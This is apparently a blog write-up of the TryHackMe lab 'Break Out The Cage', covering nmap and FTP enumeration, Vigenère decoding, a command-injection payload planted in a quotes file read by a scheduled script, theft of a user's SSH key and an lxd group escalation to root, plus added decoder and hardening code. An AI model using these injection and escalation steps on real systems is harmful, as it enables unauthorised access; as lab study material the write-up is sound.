Writeup — THM Break Out The Cage

Jari Laurila
4 min read · Nov 18, 2020


Help Cage bring back his acting career and investigate the nefarious goings on of his agent!

This is a writeup for TryHackMe room Break Out The Cage.

Reconnaissance

Start with an nmap scan:

nmap -sC -sV -p- 10.10.3.235
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-18 18:37 EET
Nmap scan report for 10.10.3.235
Host is up (0.059s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 396 May 25 23:33 dad_tasks
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.108.247
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA)
| 256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA)
|_ 256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Nicholas Cage Stories
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Anonymous FTP is enabled, so let’s check it out. There is a single file, dad_tasks:

UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds

Base64-decoded, this is:

Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.
Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

This is Vigenère-encrypted and can be decoded online without knowing the key (the solver reveals it to be namelesstwo):

Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what "information security" is.
In case I forget....
_______________________REDACTED_________________
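As an added example (not part of the original writeup), here is the decryption step in Python with the recovered key namelesstwo, applied to the first two ciphertext lines above; it also shows how lining up a known plaintext fragment against its ciphertext exposes the repeating key. The key advances only on letters and runs across line breaks, which is why the text has to be decoded as one string.

```python
import string

def vigenere_decrypt(ciphertext: str, key: str) -> str:
    """Decrypt a Vigenère ciphertext, preserving case and passing
    non-letters through unchanged. The key index advances only when
    a letter is consumed, so spaces, punctuation and newlines do not
    shift the key stream."""
    key = key.upper()
    out = []
    k = 0
    for ch in ciphertext:
        if ch in string.ascii_letters:
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[k % len(key)]) - ord("A")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)

def key_stream_from_crib(ciphertext: str, plaintext: str) -> str:
    """Given a ciphertext fragment and the plaintext it is known to
    encrypt, recover the key letters used (letters only). The period
    at which the result repeats is the key length."""
    stream = []
    for c, p in zip(ciphertext, plaintext):
        if c in string.ascii_letters and p in string.ascii_letters:
            stream.append(chr((ord(c.upper()) - ord(p.upper())) % 26 + ord("a")))
    return "".join(stream)

# First two lines of the base64-decoded dad_tasks file from the room.
CIPHERTEXT = (
    "Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!\n"
    "Sfw. Kajnmb xsi owuowge"
)
KEY = "namelesstwo"

def decode_dad_tasks() -> str:
    return vigenere_decrypt(CIPHERTEXT, KEY)

if __name__ == "__main__":
    print(decode_dad_tasks())
    # The crib "Dads Tasks - The RAGE" yields "namelesstwonamel": the key
    # repeats after 11 letters.
    print(key_stream_from_crib("Qapw Eekcl - Pvr RMKP", "Dads Tasks - The RAGE"))
```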

Web server enumeration

Using gobuster, the only thing I find is an mp3 with corrupted data (steganography?) in it:

http://10.10.3.235/auditions/must_practice_corrupt_file.mp3

I did try to analyze it with various tools but didn’t find anything.

Linux enumeration

Let’s see if I can log in as Weston (the son’s name is on the front page) with the very long password. Yes I can! So it’s time to enumerate the server. Since I know the password, the first thing to check is sudo:

sudo -l
[sudo] password for weston:
Matching Defaults entries for weston on national-treasure:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User weston may run the following commands on national-treasure:
(root) /usr/bin/bees

Too bad the program isn’t very useful:

#!/bin/bash
wall "AHHHHHHH THEEEEE BEEEEESSSS!!!!!!!!"

While enumerating I notice that I periodically get random Cage quotes via wall, so let’s see who is sending them. I find the culprit with:

$ find / -user cage 2> /dev/null
/home/cage
/opt/.dads_scripts
/opt/.dads_scripts/spread_the_quotes.py
/opt/.dads_scripts/.files
/opt/.dads_scripts/.files/.quotes

The file is a Python program:

cat spread_the_quotes.py
#!/usr/bin/env python
#Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!)
import os
import random
lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines()
quote = random.choice(lines)
os.system("wall " + quote)

I can’t write to the script itself, but I can write to the .quotes file since I’m in the cage group:

$ id
uid=1001(weston) gid=1001(weston) groups=1001(weston),1000(cage)

The last line of the program is vulnerable to command injection: the quote is concatenated into a shell command string, so a semicolon in a quote starts a second command that runs as the script’s owner. Let’s start by making all of Cage’s files readable to me:

echo "Damn; chmod -R a+rx /home/cage" > .quotes

After the script executes, grab the user flag from /home/cage/Super_Duper_Checklist. Also rm the Python script to stop the annoying messages.
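Added example (not from the writeup or the room): the same script rewritten so the quote reaches wall as a single argv element with no shell in between, and so the quotes file is refused unless it is owned by the running user and not group- or world-writable, which is the condition that made this scheduled job exploitable. Function names and the helper are mine.

```python
import os
import random
import stat
import subprocess
import tempfile

# Constructed quote carrying the injection payload from the writeup.
INJECTED_QUOTE = "Damn; chmod -R a+rx /home/cage"

def build_wall_argv(quote):
    """Return the argv for wall. Passed as a list with no shell, the
    whole quote is one argument: the ';' is text, not a separator."""
    return ["wall", quote]

def quotes_file_is_trusted(path, expected_uid=None):
    """False if the file is group- or world-writable, or is owned by
    someone other than expected_uid (default: the effective user).
    A job running as root must not act on input others can modify."""
    st = os.stat(path)
    owner = os.geteuid() if expected_uid is None else expected_uid
    writable_by_others = bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    return st.st_uid == owner and not writable_by_others

def check_mode(mode):
    """Helper: create a temporary file with the given mode and report
    whether quotes_file_is_trusted would accept it."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, mode)
        return quotes_file_is_trusted(path)
    finally:
        os.unlink(path)

def spread_a_quote(quotes_path):
    """Hardened spread_the_quotes.py: refuse an untrusted quotes file,
    pick a line, and run wall without a shell. Returns the argv used."""
    if not quotes_file_is_trusted(quotes_path):
        raise PermissionError(f"{quotes_path} is modifiable by others; refusing")
    with open(quotes_path) as f:
        lines = [ln for ln in f.read().splitlines() if ln.strip()]
    argv = build_wall_argv(random.choice(lines))
    subprocess.run(argv, check=True)  # list form: no shell parses the quote
    return argv
```

With the original 0664 group-writable .quotes file the check fails and the job refuses to run, which is exactly the state a defender wants logged rather than silently executed.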

Privesc

Start by looking at Cage’s files. There is a folder with email backups, /home/cage/email_backup, and one interesting email:

cat email_3
From - Cage@nationaltreasure.com
To - Weston@nationaltreasure.com
Hey Son
Buddy, Sean left a note on his desk with some really strange writing on it. I quickly wrote
down what it said. Could you look into it please? I think it could be something to do with his
account on here. I want to know what he's hiding from me... I might need a new agent. Pretty
sure he's out to get me. The note said:
__REDACTED__
The guy also seems obsessed with my face lately. He came in wearing a mask of my face...
was rather odd. Imagine wearing his ugly face.... I wouldn't be able to FACE that!!
hahahahahahahahahahahahahahahaahah get it Weston! FACE THAT!!!! hahahahahahahhaha
ahahahhahaha. Ahhh Face it... he's just odd.
Regards
The Legend - Cage

I tried logging in as root with that note, and with ROT-13 variants and other simple ciphers, but no luck. Better to continue enumerating as cage, so grab his SSH key from /home/cage/.ssh/id_rsa and log in as cage. Since we don’t have his password we can’t check sudo. Running id shows that cage is in the lxd group:

uid=1000(cage) gid=1000(cage) groups=1000(cage),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)

So let’s grab the exploit instructions from here. I’m not going to repeat them since they’re easy to follow. Basically we create a minimal Linux image, launch an instance from it with the host’s file system mounted into a directory with root permissions, and then go get the flag from /root/email_backup/email_2.

That’s all folks! — Nicholas Cage

EDIT: After checking how others have solved it, it seems I took the hard route. The intended way would have been to decode the password in the email.

Written by Jari Laurila

CTO by day, learning cybersecurity by night.
